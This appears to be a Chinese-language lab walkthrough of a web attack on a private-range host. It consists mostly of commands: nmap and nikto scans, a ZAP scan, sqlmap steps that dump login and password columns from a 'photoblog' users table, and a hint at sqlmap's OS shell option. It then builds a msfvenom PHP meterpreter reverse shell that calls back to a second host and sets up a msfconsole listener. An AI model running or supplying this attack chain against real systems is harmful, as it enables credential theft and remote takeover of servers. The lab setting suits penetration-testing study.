SQL注入(get)

信息探测

扫描主机服务信息以及服务版本

nmap -sV 192.168.101.50

快速扫描全部信息

nmap -T4 -A -v 192.168.101.50

扫描敏感信息

nikto -host http://192.168.101.50:80

深入挖掘

分析nmap、nikto扫描结果,并对结果进行分析
使用浏览器打开http://192.168.101.50:80

漏洞扫描

使用web漏洞扫描器owasp-zap(ZAP)
打开之后选择Automated Scan,然后输入目标ip开始进行攻击,等待GET信息返回完毕
然后查看是否可以进行sql注入

使用sqlmap利用sql注入漏洞

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3"		查看id是否具有sql漏洞

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -dbs 		查看数据库名

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" --tables	查看对应数据库中的表

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" --columns 	查看对应字段

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" -C 'login,password' --dump	查看对应字段的值

(也可以直接尝试sqlmap -u-url -os-shell直接获取shell)

得到用户名和密码后重新返回http://192.168.101.50:80使用用户名和密码登录



生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.51 lport=4444 -f raw 

gedit shellcd.php
(将生成的php代码拷贝到shellcd.php中)

上传shell反弹监听

打开msfconsole
msfconsole

启动监听模式
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lport 4444
run

你可能感兴趣的:(网络安全,web安全)